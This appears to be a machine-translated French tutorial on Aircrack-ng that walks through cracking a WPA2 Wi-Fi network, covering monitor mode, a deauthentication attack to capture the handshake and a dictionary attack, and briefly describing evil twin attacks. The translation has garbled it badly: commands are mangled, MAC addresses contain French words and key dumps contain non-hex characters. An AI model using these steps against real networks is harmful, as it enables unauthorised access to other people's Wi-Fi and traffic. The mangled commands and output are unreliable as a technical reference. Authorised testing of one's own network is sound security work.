Comment utiliser Aircrack-ng

How Use Aircrack Ng



La plupart du temps, les gens ne pensent jamais au réseau auquel ils sont connectés. Ils ne pensent jamais à quel point ce réseau est sécurisé et à quel point ils risquent quotidiennement leurs données confidentielles. Vous pouvez exécuter des vérifications de vulnérabilité sur vos réseaux wifi en utilisant un outil très puissant appelé Aircrack-ng et Wireshark. Wireshark est utilisé pour surveiller l'activité du réseau. Aircrack-ng ressemble plus à un outil agressif qui vous permet de pirater et de donner accès aux connexions sans fil. Penser comme un intrus a toujours été le moyen le plus sûr de se protéger contre un piratage. Vous pourrez peut-être comprendre les actions exactes qu'un intrus prendra pour accéder à votre système en vous renseignant sur aircrack. Vous pouvez ensuite effectuer des contrôles de conformité sur votre propre système pour vous assurer qu'il n'est pas dangereux.

Aircrack-ng est un ensemble complet de logiciels conçus pour tester la sécurité du réseau WiFi. Il ne s'agit pas d'un simple outil, mais d'un ensemble d'outils, chacun remplissant un objectif particulier. Différents domaines de la sécurité wifi peuvent être travaillés, comme surveiller le point d'accès, tester, attaquer le réseau, cracker le réseau wifi et le tester. L'objectif principal d'Aircrack est d'intercepter les paquets et de déchiffrer les hachages pour casser les mots de passe. Il prend en charge presque toutes les nouvelles interfaces sans fil. Aircrack-ng est une version améliorée d'une suite d'outils obsolète Aircrack, ng fait référence au Nouvelle génération . Certains des outils géniaux qui fonctionnent ensemble pour accomplir une tâche plus importante.







Airmon :

Airmon-ng est inclus dans le kit aircrack-ng qui place la carte d'interface réseau en mode moniteur. Les cartes réseau n'accepteront généralement que les paquets qui leur sont destinés, tels que définis par l'adresse MAC de la carte réseau, mais avec airmon-ng, tous les paquets sans fil, qu'ils leur soient destinés ou non, seront également acceptés. Vous devriez pouvoir intercepter ces paquets sans vous connecter ni vous authentifier avec le point d'accès. Il permet de vérifier l'état d'un point d'accès en mettant l'interface réseau en mode moniteur. Tout d'abord, il faut configurer les cartes sans fil pour activer le mode moniteur, puis tuer tous les processus d'arrière-plan si vous pensez qu'un processus interfère avec cela. Après avoir terminé les processus, le mode moniteur peut être activé sur l'interface sans fil en exécutant la commande ci-dessous :



[email protégé] :~$sudoairmon-ng démarrer wlan0#

Vous pouvez également désactiver le mode moniteur en arrêtant l'airmon-ng à tout moment en utilisant la commande ci-dessous :

[email protégé] :~$sudoairmon-ng stop wlan0#

Airodump :

Airodump-ng permet de répertorier tous les réseaux qui nous entourent et d'afficher des informations précieuses les concernant. La fonctionnalité de base d'airodump-ng est de renifler les paquets, il est donc essentiellement programmé pour récupérer tous les paquets autour de nous tout en étant mis en mode moniteur. Nous l'exécuterons sur toutes les connexions autour de nous et collecterons des données telles que le nombre de clients connectés au réseau, leurs adresses mac correspondantes, le style de cryptage et les noms de canaux, puis commencerons à cibler notre réseau cible.

En tapant la commande airodump-ng et en lui donnant le nom de l'interface réseau comme paramètre, nous pouvons activer cet outil. Il listera tous les points d'accès, la quantité de paquets de données, les méthodes de cryptage et d'authentification utilisées, et le nom du réseau (ESSID). D'un point de vue hacking, les adresses mac sont les champs les plus importants.

[email protégé] :~$sudoairodump-ng wlx0mon

Aircrack :

Aircrack est utilisé pour déchiffrer les mots de passe. Après avoir capturé tous les paquets à l'aide d'airodump, nous pouvons déchiffrer la clé par aircrack. Il craque ces clés en utilisant deux méthodes PTW et FMS. L'approche PTW se fait en deux phases. Au début, seuls les paquets ARP sont utilisés, et seulement ensuite, si la clé n'est pas craquée après la recherche, elle utilise tous les autres paquets capturés. Un point positif de l'approche PTW est que tous les paquets ne sont pas utilisés pour le craquage. Dans la deuxième approche, c'est-à-dire FMS, nous utilisons à la fois les modèles statistiques et les algorithmes de force brute pour déchiffrer la clé. Une méthode de dictionnaire peut également être utilisée.

Aireplay :

Airplay-ng introduit des paquets dans un réseau sans fil pour créer ou accélérer le trafic. Les paquets provenant de deux sources différentes peuvent être capturés par aireplay-ng. Le premier est le réseau en direct, et le second est les paquets du fichier pcap déjà existant. Airplay-ng est utile lors d'une attaque de désauthentification qui cible un point d'accès sans fil et un utilisateur. De plus, vous pouvez effectuer certaines attaques comme l'attaque du café au lait avec airplay-ng, un outil qui vous permet d'obtenir une clé du système du client. Vous pouvez y parvenir en interceptant un paquet ARP, puis en le manipulant et en le renvoyant au système. Le client créera alors un paquet qui peut être capturé par airodump et aircrack déchiffre la clé de ce paquet modifié. Certaines autres options d'attaque d'airplay-ng incluent chopchop, fragment arepreplay, etc.

Base aérienne:

Airbase-ng est utilisé pour transformer l'ordinateur d'un intrus en un point de connexion compromis pour que d'autres puissent se connecter. En utilisant Airbase-ng, vous pouvez prétendre être un point d'accès légal et mener des attaques de l'homme du milieu sur les ordinateurs connectés à votre réseau. Ces types d'attaques sont appelés Evil Twin Attacks. Il est impossible pour les utilisateurs de base de discerner entre un point d'accès légal et un faux point d'accès. Ainsi, la menace jumelle maléfique fait partie des menaces sans fil les plus menaçantes auxquelles nous sommes confrontés aujourd'hui.

Airolib-ng :

Airolib accélère le processus de piratage en stockant et en gérant les listes de mots de passe et le point d'accès. Le système de gestion de base de données utilisé par ce programme est SQLite3, qui est principalement disponible sur toutes les plateformes. Le craquage de mot de passe comprend le calcul de la clé principale par paire à travers laquelle la clé transitoire privée (PTK) est extraite. En utilisant le PTK, vous pouvez déterminer le code d'identification de message de trame (MIC) pour un paquet donné et trouver théoriquement que le MIC est similaire au paquet, donc si le PTK avait raison, le PMK avait également raison.

Pour voir les listes de mots de passe et les réseaux d'accès stockés dans la base de données, tapez la commande suivante :

[email protégé] :~$sudobase de données de test airolib-ng –stats

Ici, testdatabase est la base de données à laquelle vous souhaitez accéder ou créer, et –stats est l'opération que vous souhaitez effectuer dessus. Vous pouvez effectuer plusieurs opérations sur les champs de la base de données, comme donner une priorité maximale à un SSID ou quelque chose. Pour utiliser airolib-ng avec aircrack-ng, saisissez la commande suivante :

[email protégé] :~$sudoaircrack-ng-rbase de données de test wpa2.eapol.cap

Ici, nous utilisons les PMK déjà calculées stockées dans le base de données de test pour accélérer le processus de craquage de mot de passe.

Cracker WPA/WPA2 à l'aide d'Aircrack-ng :

Regardons un petit exemple de ce que aircrack-ng peut faire avec l'aide de quelques-uns de ses outils impressionnants. Nous allons cracker la clé pré-partagée d'un réseau WPA/WPA2 à l'aide d'une méthode de dictionnaire.

La première chose que nous devons faire est de répertorier les interfaces réseau qui prennent en charge le mode moniteur. Cela peut être fait à l'aide de la commande suivante :

[email protégé] :~$sudoairmon-ng

Jeu de puces de pilote d'interface PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

On peut voir une interface ; maintenant, nous devons mettre l'interface réseau que nous avons trouvée ( wlx0 ) en mode moniteur à l'aide de la commande suivante :

[email protégé] :~$sudoairmon-ng démarrer wlx0

Il a activé le mode moniteur sur l'interface appelée wlx0mon .

Maintenant, nous devrions commencer à écouter les émissions des routeurs à proximité via notre interface réseau que nous avons mise en mode moniteur.

[email protégé] :~$sudoairodump-ng wlx0mon

CH5 ][écoulé :30s][ 2020-12-02 00 :17



Balises BSSID PWR#Données, #/s CH MB ENC CIPHER AUTH ESSID



E4 : 6F :13:04:CE:31 -Quatre cinq 62 27 0 154e WPA2 CCMP PSK CrackIt

C4:E9 :84:76:dix:ÊTRE-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8:3A :35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74:DONNE :88:FA:38: 02-68 28 2 0 Onze54e WPA2 CCMP PSK TP-Link_3802



Sonde de trames perdues de taux PWR STATION BSSID



E4 : 6F :13:04:CE:315C:3A :Quatre cinq: D7: EA: 8B -3 0- 1e8 5

E4 : 6F :13:04:CE:31C4 :67:D3:C2:CD:D7 -331e-6e0 3

E4 : 6F :13:04:CE:315C:C3:07 :56:61: EF -35 0-1 0 6

E4 : 6F :13:04:CE:31AVANT JC:91:B5:F8:7E:D5 -390e-1 1002 13

Notre réseau cible est Craque le dans ce cas, qui fonctionne actuellement sur le canal 1.

Ici, afin de déchiffrer le mot de passe du réseau cible, nous devons capturer une poignée de main à 4 voies, ce qui se produit lorsqu'un appareil essaie de se connecter à un réseau. Nous pouvons le capturer en utilisant la commande suivante :

[email protégé] :~$sudoairodump-ng-c 1--bssid E4: 6F:13:04:CE:31 -dans /maison wlx0

-c : Canaliser

–Bss : Bssid du réseau cible

-dans : Le nom du répertoire où sera placé le fichier pcap

Nous devons maintenant attendre qu'un appareil se connecte au réseau, mais il existe un meilleur moyen de capturer une poignée de main. Nous pouvons désauthentifier les appareils sur le point d'accès à l'aide d'une attaque de désauthentification à l'aide de la commande suivante :

[email protégé] :~$sudoaireplay-ng-0 E4 : 6F :13:04:CE:31

à : Bssid du réseau cible

-0 : attaque de désauthentification

Nous avons déconnecté tous les appareils et nous devons maintenant attendre qu'un appareil se connecte au réseau.

CH1 ][écoulé :30s][ 2020-12-02 00:02][Poignée de main WPA : E4 : 6F :13:04:CE:31



Balises BSSID PWR RXQ#Données, #/s CH MB ENC CIPHER AUTH E



E4 : 6F :13:04:CE:31 -47 1 228 807 36 154e WPA2 CCMP PSK P



Sonde de trames perdues de taux PWR STATION BSSID



E4 : 6F :13:04:CE:31AVANT JC:91:B5:F8:7E:D5 -35 0-1 0 1

E4 : 6F :13:04:CE:315C:3A :Quatre cinq: D7: EA: 8B -290e- 1e0 22

E4 : 6F :13:04:CE:31 88:28:B3:30:27:7E -310e-1 0 32

E4 : 6F :13:04:CE:31C4 :67:D3:C2:CD:D7 -350e- 6e263 708Craque le

E4 : 6F :13:04:CE:31D4 : 6A : 6A :99:ED:E3 -350e- 0e0 86

E4 : 6F :13:04:CE:315C:C3:07 :56:61: EF -37 0- 1e0 1

Nous avons eu un coup sûr, et en regardant dans le coin supérieur droit juste à côté de l'heure, nous pouvons voir qu'une poignée de main a été capturée. Maintenant, regardez dans le dossier spécifié ( /domicile dans notre cas) pour un .pcap déposer.

Afin de cracker la clé WPA, nous pouvons utiliser la commande suivante :

[email protégé] :~$sudoaircrack-ng-a2 -dansrockyou.txt-bE4 : 6F :13:04:CE:31poignée de main.cap

b :Bssid du réseau cible

-a2 :mode WPA2

Rockyou.txt : Le dictionnairedéposerutilisé

Handshake.cap: Ledéposer lequelcontient une poignée de main capturée

Aircrack-ng1.2bêta3

[00:01 :49] 10566clés testées(1017.96à/s)

CLÉ TROUVÉE! [tu m'as eu]

Clé principale : 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FcinquanteC


Clé transitoire : 4D C4 5R 6T76 996G 7H 8D CE

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC : CB 5A F8 CE62B2 1B F7 6FcinquanteC025 62E9 5D71

La clé de notre réseau cible a été craquée avec succès.

Conclusion:

Les réseaux sans fil sont partout, utilisés par chaque entreprise, des travailleurs utilisant des smartphones aux appareils de contrôle industriels. Selon les recherches, près de 50 % du trafic Internet se fera via le WiFi en 2021. Les réseaux sans fil présentent de nombreux avantages, la communication à l'extérieur des portes, un accès Internet rapide dans des endroits où il est presque impossible de poser des fils, peuvent étendre le réseau sans installer de câbles. pour tout autre utilisateur et peut facilement connecter vos appareils mobiles à vos bureaux à domicile pendant votre absence.

Malgré ces avantages, il existe un grand point d'interrogation sur votre confidentialité et votre sécurité. Comme ces réseaux ; dans la plage de transmission des routeurs sont ouverts à tous, ils peuvent facilement être attaqués et vos données peuvent facilement être compromises. Par exemple, si vous êtes connecté à un réseau wifi public, toute personne connectée à ce réseau peut facilement vérifier le trafic de votre réseau en utilisant une certaine intelligence et à l'aide d'outils impressionnants disponibles et même le vider.